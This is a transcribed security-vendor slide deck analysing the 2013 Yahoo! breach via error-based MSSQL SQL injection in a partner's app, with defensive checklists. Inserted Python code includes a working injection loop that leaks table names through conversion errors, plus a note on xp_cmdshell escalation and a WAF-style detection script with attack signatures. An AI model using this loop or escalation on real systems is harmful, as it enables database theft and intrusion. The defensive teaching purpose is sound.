1. Lessons Learned From the Yahoo! Hack
Amichai Shulman, CTO
© 2013 Imperva, Inc. All rights reserved.
2. Agenda
Finding the vulnerable Yahoo! app
+ A true cyber detective story
Yahoo! hack technical analysis
+ SQL Injection
+ Error based SQL Injection
The greater lesson
+ 3rd party code security
Summary and Conclusions
3. Amichai Shulman – CTO Imperva
Speaker at Industry Events
+ RSA, Sybase Techwave, Info Security UK, Black Hat
Lecturer on Info Security
+ Technion - Israel Institute of Technology
Former security consultant to banks & financial
services firms
Leads the Application Defense Center (ADC)
+ Discovered over 20 commercial application vulnerabilities
– Credited by Oracle, Microsoft (SQL Server), IBM and others
Named one of InfoWorld’s “Top 25 CTOs”
5. Breaking News – Yahoo! Has been Hacked
6. Gathering Evidence
The hacker released a redacted screenshot of the allegedly hacked Yahoo! app
7. Forensics – Turning Evidence into Insights (1)
Host name from address bar:
+ Ends in “yle.yahoo.net” (a yahoo.net host, not “yahoo.com”)
+ It is a relatively long host name (a deep subdomain, not a top-level Yahoo! property)
8. Forensics – Turning Evidence into Insights (2)
Error message
+ The application is powered by ASP.NET
– Most Yahoo! applications are PHP based
+ Application source file resides on C:webcorp[blackened by hacker]pYahooV2app_code, a Windows path whose final segment, app_code, is ASP.NET’s App_Code folder for shared application source, corroborating the framework identification
9. Identifying the Vulnerable Yahoo! App (1)
Host name from address bar:
+ Ends in “yle.yahoo.net” (a yahoo.net host, not “yahoo.com”)
+ It is a relatively long host name.
11. Identifying the Vulnerable Yahoo! App (2)
Error message
+ The application is powered by ASP.NET (not PHP like most Yahoo! applications)
+ Application source file resides on C:webcorp[blackened by hacker]pYahooV2app_code (a Windows path ending in ASP.NET’s App_Code folder)
13. Yahoo! Hack Technical Analysis
Error Based SQL Injection
14. Data Extraction Techniques by Hackers: 2005-2011
[Pie chart] SQL Injection: 83%; Other: 17%
Total = 315,424,147 records (856 breaches)
Source: Privacy Rights Clearinghouse
16. SQL Injection: Technical Impact
Retrieve sensitive data from the organization
Steal the site’s administrator password
Lead to the downloading of malware by the site’s visitors (injected content)
17. Still A Very Relevant Attack
On average, we have identified 53 SQLi attacks per hour and 1,093 attacks per day.
18. SQL Injections By the Hour – Highly Automated
20. Yahoo! Hack – MSSQL Injection with Conversion Errors
Attack vector:
+ ' and 1 = convert(int, (select top 1 table_name from x))
(x stands for whichever table the attacker targets, e.g. information_schema.tables)
The server tries to convert the extra data returned by the subquery (in this case a table name) to an integer
A non-numeric character string cannot be converted to an integer, so SQL Server raises a conversion error, and the error text quotes the offending value
If the system is not hardened (detailed database errors are returned to the client), the error message is visible to the attacker and reveals that value; changing the subquery on each request reveals the rest of the data, one value per request
21. MSSQL Injection with Conversion Errors
No expertise is needed to exploit this
Even script kiddies can do it with automated exploit tools
+ Havij (which automates exactly this error-based technique against MSSQL)
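The loop behind that single probe, as an added Python example (not code from the Imperva deck or from Havij): it builds the convert(int, …) payload, parses the value SQL Server echoes back inside its conversion error, excludes that value, and repeats until no error comes back. information_schema.tables is assumed in place of the deck’s placeholder x, and the vulnerable page is a constructed stand-in that imitates an ASP.NET page returning raw database errors; no real server or database is involved.

```python
"""Error-based SQL injection via MSSQL conversion errors: attacker-side loop.

Added example, not from the Imperva deck. Enumerates table names one per
request by parsing the value SQL Server quotes in its conversion error.

ASSUMPTIONS: information_schema.tables stands in for the deck's placeholder
"x"; the HTTP layer is replaced by a constructed stand-in (not SQL Server).
"""
import re

# SQL Server wording differs by version; both forms quote the leaked value.
#   2008+:    Conversion failed when converting the nvarchar value 'users' to data type int.
#   2000/2005: Syntax error converting the nvarchar value 'users' to a column of data type int.
CONVERSION_ERROR = re.compile(
    r"converting the (?:n?varchar|n?char) value '((?:[^']|'')*)' to"
)


def build_payload(seen):
    """Probe for the next table name not yet extracted.

    The NOT IN list is what advances the enumeration: every name already
    leaked is excluded, so TOP 1 yields a new one on each request."""
    exclusions = ", ".join("'" + t.replace("'", "''") + "'" for t in seen)
    where = " where table_name not in (%s)" % exclusions if seen else ""
    return ("' and 1 = convert(int, (select top 1 table_name "
            "from information_schema.tables%s))--" % where)


def leaked_value(response_body):
    """Return the value SQL Server quoted in the error, or None if no error."""
    m = CONVERSION_ERROR.search(response_body)
    return m.group(1).replace("''", "'") if m else None


def extract_tables(send, limit=100):
    """Drive the loop: send probe, parse leaked value, exclude it, repeat.

    `send` takes the injected suffix and returns the HTTP response body."""
    found = []
    while len(found) < limit:
        value = leaked_value(send(build_payload(found)))
        if value is None:      # no error: TOP 1 returned NULL, nothing left
            break
        found.append(value)
    return found


# ---- constructed stand-in for the vulnerable page (NOT SQL Server) ----
FAKE_TABLES = ["users", "horoscopes", "admin_login"]  # constructed sample


def fake_vulnerable_page(payload):
    """Imitates an ASP.NET page that splices the payload into its query and
    shows the raw database error (customErrors Off). It only honours the
    NOT IN list, which is all the loop above relies on."""
    excluded = []
    if "not in" in payload:
        tail = payload.split("not in", 1)[1]
        excluded = [e.replace("''", "'") for e in re.findall(r"'((?:[^']|'')*)'", tail)]
    remaining = [t for t in FAKE_TABLES if t not in excluded]
    if not remaining:
        return "<html>Your horoscope for today...</html>"  # normal page, no error
    return ("Server Error in '/' Application.\n"
            "Conversion failed when converting the nvarchar value "
            "'%s' to data type int." % remaining[0])


if __name__ == "__main__":
    print(extract_tables(fake_vulnerable_page))
```

Against a real target, `fake_vulnerable_page` is replaced by a function that sends the HTTP request and returns the body; swapping the inner SELECT enumerates columns or rows the same way. The defensive counterparts are the two controls the loop depends on: the raw database error must not reach the response (ASP.NET customErrors mode="On"), and the query must be parameterized so the leading quote is data rather than SQL.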
22. From SQL Injection to Command Execution
In case of SQL injection into an MSSQL database, an attacker can leverage it to run arbitrary OS commands using the “xp_cmdshell” extended stored procedure
+ xp_cmdshell is disabled by default since SQL Server 2005, but it can be re-enabled with sp_configure when the application’s database login holds sysadmin rights, which is why least-privilege database accounts matter
Supported by exploit tools
23. 3rd Party Code Security
24. Vulnerable Application is a 3rd Party Application
“The leading astrology portal in India… formed co-
branded channel alliances with internationally recognized
brands such as MSN, Yahoo! and Google”
25. Vulnerable Application is Hosted by 3rd Party
Routing of users from Yahoo! to Astroyogi.com with a DNS alias (CNAME record):
“in.horoscopes.lifestyle.yahoo.net” → “yahoo.astroyogi.com”
This is the “…yle.yahoo.net” host name seen in the screenshot: the page was served from Astroyogi’s infrastructure under a Yahoo!-owned name
26. You Don’t Own the Code of All Your Applications
Yahoo! is not alone
3rd party applications are embedded as code or by hosting in many organizations
28% of Veracode-assessed applications are identified as created by a 3rd party
27. You Don’t Even Own All the Code of YOUR Applications
Even homegrown applications are mostly comprised of 3rd party code
According to Veracode:
+ “Up to 70% of internally developed code originates outside of the development team”
28. Third Party Code Related Breaches
31. SQL Injection Mitigation Checklist
32. Step 1: Use a WAF to Detect SQL Injection
Positives
+ Can block many attacks
+ Relatively easy
Negatives
+ Can become a crutch
+ Potential for false positives
33. Step 2: Deploy Reputation Based Solution
Positives
+ Blocks up to 40% of attack traffic
+ Easy
Negatives
+ Does not deal with the underlying problem
34. Step 3: Stop Automated Attack Tools
Positives
+ Detects automated tool fingerprints to block attacks
+ Relatively easy
Negatives
+ Potential for false positives
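What Steps 1 and 3 look like in practice, and how the hourly automation pattern of slide 18 falls out of the same data, as an added Python example (not Imperva’s product logic or code): it parses web access log lines, flags the conversion-error probe and other SQLi signatures in the decoded URL, matches automated-tool User-Agent fingerprints, and counts flagged requests per source IP per hour. The log lines are constructed for this example, and the fingerprint strings (Havij, sqlmap) are an assumption about what those tools send, not verified defaults; treat them as a list to maintain.

```python
"""WAF-style detection over web access logs: SQLi signatures, automated-tool
fingerprints, and per-hour burst counting.

Added example, not Imperva's code. SAMPLE_LOG is constructed; the tool
fingerprints are ASSUMED User-Agent substrings, not verified defaults.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Combined-log-format lines, constructed for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Jan/2013:10:02:01 +0000] "GET /horoscope.aspx?sign=aries HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [13/Jan/2013:10:02:07 +0000] "GET /horoscope.aspx?sign=aries'%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))-- HTTP/1.1" 500 1840 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Havij)"
203.0.113.9 - - [13/Jan/2013:10:02:08 +0000] "GET /horoscope.aspx?sign=aries'%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('users')))-- HTTP/1.1" 500 1840 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Havij)"
203.0.113.9 - - [13/Jan/2013:10:02:09 +0000] "GET /horoscope.aspx?sign=aries%27%20union%20select%20null,null-- HTTP/1.1" 500 1840 "-" "sqlmap/1.0-dev"
203.0.113.7 - - [13/Jan/2013:11:15:42 +0000] "GET /horoscope.aspx?sign=leo HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Signatures matched against the URL-decoded request path, case-insensitively.
SQLI_SIGNATURES = {
    "mssql_conversion_error_probe": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "boolean_tautology": re.compile(r"'\s*(and|or)\s+\d+\s*=\s*\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "comment_terminator": re.compile(r"(--|/\*)\s*$"),
}
# ASSUMED User-Agent fingerprints of automated SQLi tools (maintain this list).
TOOL_FINGERPRINTS = ("havij", "sqlmap")


def parse_line(line):
    """Split one access-log line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Decode twice so a double-encoded payload cannot slip past the signatures.
    rec["decoded_path"] = unquote_plus(unquote_plus(rec["path"]))
    return rec


def classify(rec):
    """Return the names of every signature and tool fingerprint that fires."""
    hits = [name for name, rx in SQLI_SIGNATURES.items() if rx.search(rec["decoded_path"])]
    ua = rec["ua"].lower()
    hits += ["tool:" + t for t in TOOL_FINGERPRINTS if t in ua]
    return hits


def analyze(log_text):
    """Classify each request; count flagged requests per (source IP, hour)."""
    findings = []
    per_hour = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec)
        if hits:
            hour = rec["ts"][:14]          # "13/Jan/2013:10:02:07 +0000" -> "13/Jan/2013:10"
            per_hour[(rec["ip"], hour)] += 1
            findings.append((rec["ip"], rec["ts"], hits))
    return findings, per_hour


if __name__ == "__main__":
    found, buckets = analyze(SAMPLE_LOG)
    for ip, ts, hits in found:
        print(ip, ts, ", ".join(hits))
    print(dict(buckets))
```

Blocking on the signature alone is Step 1, blocking on the User-Agent is Step 3, and the per-hour bucket is the evidence for treating a source as an automated scanner rather than a single curious user; the false-positive risk the slides mention shows up in the boolean_tautology and comment_terminator signatures, which should raise a request’s score rather than block it on their own.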
35. Step 4: WAF + Vulnerability Scanner
“Security No-Brainer #9:
Application Vulnerability Scanners
Should Communicate with
Application Firewalls”
—Neil MacDonald, Gartner
Source: http://blogs.gartner.com/neil_macdonald/2009/08/19/security-no-brainer-9-application-vulnerability-scanners-should-communicate-with-application-firewalls/
36. 3rd Party Code Mitigation Checklist
37. Technical Level Recommendations
Assume third-party code (coming from partners, vendors, or mergers and acquisitions) contains serious vulnerabilities
Pen test before deployment to identify these issues
Deploy the application behind a WAF to
+ Virtually patch pen test findings
+ Mitigate new risks (unknown at pen test time)
+ Mitigate issues the pen tester missed
+ Use a cloud WAF for remotely hosted applications (as in the Yahoo! case, where the vulnerable app ran on a partner’s servers)
Virtually patch newly discovered CVEs
+ Requires a robust security update service
38. Webinar Materials
Join the Imperva LinkedIn Group, Imperva Data Security Direct, for:
+ Answers to post-webinar questions
+ Attendee discussions
+ Webinar recording link